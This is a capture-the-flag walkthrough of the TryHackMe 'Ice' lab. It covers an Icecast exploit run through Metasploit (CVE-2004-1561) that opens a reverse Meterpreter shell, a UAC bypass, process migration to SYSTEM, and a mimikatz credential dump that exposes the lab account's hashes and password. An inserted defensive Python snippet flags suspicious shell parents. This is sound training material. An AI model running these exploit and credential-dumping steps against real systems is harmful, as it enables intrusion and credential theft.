Disclaimer

The host penetrated in this article was legally authorized. The tools and methods used here are for learning and exchange only. Please do not use the tools or penetration ideas in this article for any illegal purpose. I accept no responsibility for any consequences arising from that, nor for any misuse or damage caused.

Service scan

┌──(root㉿kali)-[~/tryhackme/ice]
└─# nmap -sV -Pn 10.10.121.62
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 00:43 EST
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 00:44 (0:00:19 remaining)
Nmap scan report for 10.10.121.62
Host is up (0.30s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http               Icecast streaming media server
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Many ports are open. The service on port 8000 is the one to note: CVE Details lists an Execute Code / Overflow vulnerability for it, CVE-2004-1561.

Search msf for an exploit module matching this CVE:

msf6 > search CVE-2004-1561

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

Initial shell

Set the options and run the exploit; we get an initial shell.

msf6 exploit(windows/http/icecast_header) > set rhosts 10.10.121.62
rhosts => 10.10.121.62
msf6 exploit(windows/http/icecast_header) > set lhost tun0
lhost => tun0
msf6 exploit(windows/http/icecast_header) > run

[*] Started reverse TCP handler on 10.13.21.169:4444 
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.121.62:49302) at 2021-11-15 02:40:26 -0500

meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\dark

Use post/multi/recon/local_exploit_suggester to enumerate candidate privilege-escalation modules

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.121.62 - Collecting local exploits for x86/windows...
[*] 10.10.121.62 - 37 exploit checks are being tried...
[+] 10.10.121.62 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.121.62 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.121.62 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

We pick the exploit/windows/local/bypassuac_eventvwr module, set its options, and run it to escalate.

msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.3.67     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 10.13.21.169:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.10.121.62
[*] Meterpreter session 2 opened (10.13.21.169:4444 -> 10.10.121.62:49336) at 2021-11-15 03:12:02 -0500
[*] Cleaning up registry keys ...

meterpreter > shell
Process 356 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>whoami
whoami
dark-pc\dark
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Privilege escalation

Our account is still dark-pc\dark, but getprivs shows that the process now holds SeTakeOwnershipPrivilege.

Use the ps command to list every process on the target:

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 500   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 588   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 816   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 884   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 932   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1056  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1136  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1224  816   slui.exe              x64   1        Dark-PC\Dark                  C:\Windows\System32\slui.exe
 1264  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1328  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1408  692   taskhost.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\taskhost.exe
 1516  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1528  500   dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
 1548  1508  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
 1712  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1720  692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 1752  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1804  816   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 1892  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 2108  2300  cmd.exe               x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\cmd.exe
 2124  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2284  604   conhost.exe           x64   1        Dark-PC\Dark                  C:\Windows\System32\conhost.exe
 2300  1548  Icecast2.exe          x86   1        Dark-PC\Dark                  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2352  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2460  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 2528  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2536  2092  powershell.exe        x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
 2916  604   conhost.exe           x64   1        Dark-PC\Dark                  C:\Windows\System32\conhost.exe

Note this process:

 1264  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe

This process is x64, the same architecture as the current process. We migrate into it with migrate -N and obtain the highest system privileges.

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2536 to 1264...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
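From the defender's side, the foothold and escalation above leave a clear trace in the process tree: a cmd.exe whose parent is the Icecast2.exe service, and a powershell.exe whose parent PID (2092) is no longer in the listing. The following is an added example, not part of the original writeup, that parses rows taken from the ps listing above and flags shells with such parents; the parent allowlist is a hypothetical baseline to be tuned per environment.

```python
import re
from collections import namedtuple

# Rows taken from the meterpreter `ps` listing in this writeup (a subset of it);
# the header row and any row without an Arch column are skipped by the parser.
PS_OUTPUT = r"""
 PID   PPID  Name                  Arch  Session  User                          Path
 692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 1264  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1548  1508  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
 2108  2300  cmd.exe               x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\cmd.exe
 2300  1548  Icecast2.exe          x86   1        Dark-PC\Dark                  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2536  2092  powershell.exe        x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
"""

Proc = namedtuple("Proc", "pid ppid name arch user path")
# User may contain one space ("NT AUTHORITY\SYSTEM"); Path begins after the first
# run of two or more spaces following the Session column.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x64|x86)\s+"
    r"(?P<session>\d+)\s+(?P<user>.+?)\s{2,}(?P<path>\S.*?)\s*$"
)

def parse_ps(text: str) -> dict[int, Proc]:
    """Return a pid -> Proc map for every row matching the column layout."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            procs[int(m["pid"])] = Proc(int(m["pid"]), int(m["ppid"]), m["name"],
                                        m["arch"], m["user"], m["path"])
    return procs

SHELLS = {"cmd.exe", "powershell.exe"}
# Hypothetical allowlist of parents from which an interactive shell is
# unremarkable on a workstation; tune it to the environment's own baseline.
EXPECTED_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe"}

def suspicious_shells(procs: dict[int, Proc]) -> list[str]:
    """Flag shells whose parent is not allowlisted or is absent from the listing."""
    findings = []
    for p in procs.values():
        if p.name.lower() not in SHELLS:
            continue
        parent = procs.get(p.ppid)
        if parent is None:
            findings.append(f"{p.name}[{p.pid}]: parent pid {p.ppid} absent from listing")
        elif parent.name.lower() not in EXPECTED_SHELL_PARENTS:
            findings.append(f"{p.name}[{p.pid}]: spawned by {parent.name}[{parent.pid}] ({parent.path})")
    return findings
```

The same two rules apply unchanged to Sysmon or EDR process-creation telemetry, where a network service spawning a shell is the signal to alert on.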

Obtaining other users' credentials

Use load kiwi to collect credential information for the other users on the system

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.

Use the help command to see the supported kiwi commands:

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Use creds_all to print every cached user credential:

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
DARK-PC$  WORKGROUP  (null)
Dark      Dark-PC    Password01!

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
Dark      Dark-PC  Password01!

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
Dark      Dark-PC    Password01!
dark-pc$  WORKGROUP  (null)

We can see that dark's login password is: Password01!